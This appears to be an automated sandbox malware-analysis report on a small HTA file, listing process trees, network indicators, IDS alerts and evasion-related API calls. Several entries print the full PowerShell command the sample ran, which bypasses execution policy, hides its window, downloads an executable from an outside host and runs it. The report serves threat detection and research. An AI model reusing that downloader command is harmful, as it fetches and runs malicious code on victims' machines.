Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	June 24, 2021, 10:49 p.m.	June 24, 2021, 10:51 p.m.

Size	538.0B
Type	HTML document, ASCII text, with CRLF line terminators
MD5	`5562d4b0b0707245170b795a79422da3`
SHA256	`dafcd9bc5e53c080eb9d4054c4b5cb802a2a218068448613b1487cc63c6da031`
CRC32	`FB0AEB71`
ssdeep	`12:c6QclfhTD5LWy0cqSPsnWRcYnf37kYtzNk6ULWzB7BYMSe7k:csphCdcq96frkYcpE1YMdg`
Yara	Antivirus - Contains references to security software

mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\word.hta
1908
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://docuserver1.com/d/doc.exe',$env:Temp+'\EJNFTE.Exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\EJNFTE.Exe')
  1160
  - EJNFTE.Exe "C:\Users\test22\AppData\Local\Temp\EJNFTE.Exe"
    2672
    - EJNFTE.Exe "C:\Users\test22\AppData\Local\Temp\EJNFTE.Exe"
      2704

Name	Response	Post-Analysis Lookup
docuserver1.com	A 66.45.232.203	66.45.232.203
8.tcp.ngrok.io	A 3.142.81.166	3.142.167.54

IP Address	Status	Action
164.124.101.2	Active	Moloch
3.142.81.166	Active	Moloch
66.45.232.203	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
UDP 192.168.56.101:59369 -> 164.124.101.2:53	2022642	ET POLICY DNS Query to a *.ngrok domain (ngrok.io)	Potential Corporate Privacy Violation
TCP 192.168.56.101:49207 -> 66.45.232.203:80	2008350	ET POLICY Autoit Windows Automation tool User-Agent in HTTP Request - Possibly Hostile	Potential Corporate Privacy Violation
TCP 192.168.56.101:49201 -> 66.45.232.203:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 66.45.232.203:80 -> 192.168.56.101:49201	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 66.45.232.203:80 -> 192.168.56.101:49201	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Queries for the computername (9 events)

Time & API	Arguments	Status	Return
GetComputerNameW June 24, 2021, 10:49 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 24, 2021, 10:49 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 24, 2021, 10:49 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 24, 2021, 10:49 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA June 24, 2021, 10:49 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 24, 2021, 10:49 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 24, 2021, 10:49 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 24, 2021, 10:49 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 24, 2021, 10:49 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent June 24, 2021, 10:49 p.m.			0	0
IsDebuggerPresent June 24, 2021, 10:49 p.m.			0	0

Uses Windows APIs to generate a cryptographic key (40 events)

Time & API	Arguments	Status	Return
CryptExportKey June 24, 2021, 10:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00664df8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 10:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00665378 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 10:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00665378 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 10:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00665378 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 10:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00665578 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 10:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00665578 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 10:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00665578 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 10:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00665578 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 10:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00665578 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 10:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00665578 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 10:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00664db8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 10:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00664db8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 10:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00664db8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 10:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00665378 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 10:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00665378 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 10:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00665378 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 10:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006649b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 10:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00665378 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 10:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00665378 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 10:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00665378 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 10:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00665378 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 10:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00665378 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 10:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00665378 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 10:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00665378 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 10:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006656f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 10:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006656f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 10:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006656f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 10:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006656f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 10:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006656f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 10:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006656f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 10:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006656f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 10:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006656f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 10:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006656f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 10:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006656f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 10:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006656f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 10:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006656f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 10:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006656f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 10:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006656f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 10:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00665638 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey June 24, 2021, 10:49 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00665638 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx June 24, 2021, 10:49 p.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

GET method with no useragent header

suspicious_request

GET http://docuserver1.com/d/doc.exe

Performs some HTTP requests (2 events)

request	GET http://docuserver1.com/d/doc.exe
request	GET http://docuserver1.com/ng.txt

Allocates read-write-execute memory (usually to unpack itself) (50 out of 144 events)

Time & API	Arguments	Status
NtProtectVirtualMemory June 24, 2021, 10:49 p.m.	process_identifier: 1908 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72192000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10:49 p.m.	process_identifier: 1160 region_size: 2031616 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029f0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10:49 p.m.	process_identifier: 1160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ba0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 24, 2021, 10:49 p.m.	process_identifier: 1160 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6ee81000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10:49 p.m.	process_identifier: 1160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0261a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 24, 2021, 10:49 p.m.	process_identifier: 1160 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6ee82000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10:49 p.m.	process_identifier: 1160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02612000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10:49 p.m.	process_identifier: 1160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10:49 p.m.	process_identifier: 1160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ba1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10:49 p.m.	process_identifier: 1160 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ba2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10:49 p.m.	process_identifier: 1160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0270a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10:49 p.m.	process_identifier: 1160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10:49 p.m.	process_identifier: 1160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10:49 p.m.	process_identifier: 1160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0271b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10:49 p.m.	process_identifier: 1160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02717000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10:49 p.m.	process_identifier: 1160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0261b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10:49 p.m.	process_identifier: 1160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02702000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10:49 p.m.	process_identifier: 1160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02715000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10:49 p.m.	process_identifier: 1160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10:49 p.m.	process_identifier: 1160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0270c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10:49 p.m.	process_identifier: 1160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02890000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10:49 p.m.	process_identifier: 1160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026a6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10:49 p.m.	process_identifier: 1160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0271c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10:49 p.m.	process_identifier: 1160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02703000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10:49 p.m.	process_identifier: 1160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02704000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10:49 p.m.	process_identifier: 1160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02705000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10:49 p.m.	process_identifier: 1160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02706000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10:49 p.m.	process_identifier: 1160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02707000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10:49 p.m.	process_identifier: 1160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02708000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10:49 p.m.	process_identifier: 1160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02709000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10:49 p.m.	process_identifier: 1160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ad0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10:49 p.m.	process_identifier: 1160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ad1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10:49 p.m.	process_identifier: 1160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ad2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10:49 p.m.	process_identifier: 1160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ad3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10:49 p.m.	process_identifier: 1160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ad4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10:49 p.m.	process_identifier: 1160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ad5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10:49 p.m.	process_identifier: 1160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ad6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10:49 p.m.	process_identifier: 1160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ad7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10:49 p.m.	process_identifier: 1160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ad8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10:49 p.m.	process_identifier: 1160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ad9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10:49 p.m.	process_identifier: 1160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ada000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10:49 p.m.	process_identifier: 1160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02adb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10:49 p.m.	process_identifier: 1160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02adc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10:49 p.m.	process_identifier: 1160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02add000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10:49 p.m.	process_identifier: 1160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ade000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10:49 p.m.	process_identifier: 1160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02adf000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10:49 p.m.	process_identifier: 1160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10:49 p.m.	process_identifier: 1160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b41000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10:49 p.m.	process_identifier: 1160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b42000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 24, 2021, 10:49 p.m.	process_identifier: 1160 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b43000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Checks whether any human activity is being performed by constantly checking whether the foreground window changed

A process attempted to delay the analysis task. (1 event)

description

EJNFTE.Exe tried to sleep 132 seconds, actually delayed analysis time by 132 seconds

Creates executable files on the filesystem (3 events)

file	C:\Users\test22\AppData\Roaming\Temp\word.exe
file	C:\Users\test22\AppData\Local\Temp\nsf752B.tmp\System.dll
file	C:\Users\test22\AppData\Local\Temp\EJNFTE.Exe

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://docuserver1.com/d/doc.exe',$env:Temp+'\EJNFTE.Exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\EJNFTE.Exe')
cmdline	powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://docuserver1.com/d/doc.exe',$env:Temp+'\EJNFTE.Exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\EJNFTE.Exe')

Drops an executable to the user AppData folder (2 events)

file	C:\Users\test22\AppData\Local\Temp\nsf752B.tmp\System.dll
file	C:\Users\test22\AppData\Roaming\Temp\word.exe

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW June 24, 2021, 10:49 p.m.	show_type: 0 filepath_r: powershell.exe parameters: -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://docuserver1.com/d/doc.exe',$env:Temp+'\EJNFTE.Exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\EJNFTE.Exe') filepath: powershell.exe	1	1	0

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (11 events)

Time & API	Arguments	Status	Return
Process32NextW June 24, 2021, 10:49 p.m.	snapshot_handle: 0x000001d8 process_name: audiodg.exe process_identifier: 892	1	1
Process32NextW June 24, 2021, 10:49 p.m.	snapshot_handle: 0x000001d8 process_name: WmiPrvSE.exe process_identifier: 1916	1	1
Process32NextW June 24, 2021, 10:49 p.m.	snapshot_handle: 0x000001d8 process_name: pw.exe process_identifier: 2816	1	1
Process32NextW June 24, 2021, 10:49 p.m.	snapshot_handle: 0x000001d8 process_name: SearchIndexer.exe process_identifier: 2940	1	1
Process32NextW June 24, 2021, 10:49 p.m.	snapshot_handle: 0x000001d8 process_name: SearchFilterHost.exe process_identifier: 3040	1	1
Process32NextW June 24, 2021, 10:49 p.m.	snapshot_handle: 0x000001d8 process_name: SearchProtocolHost.exe process_identifier: 2120	1	1
Process32NextW June 24, 2021, 10:49 p.m.	snapshot_handle: 0x000001d8 process_name: mobsync.exe process_identifier: 1068	1	1
Process32NextW June 24, 2021, 10:49 p.m.	snapshot_handle: 0x000001d8 process_name: pw.exe process_identifier: 3056	1	1
Process32NextW June 24, 2021, 10:49 p.m.	snapshot_handle: 0x000001d8 process_name: taskhost.exe process_identifier: 2832	1	1
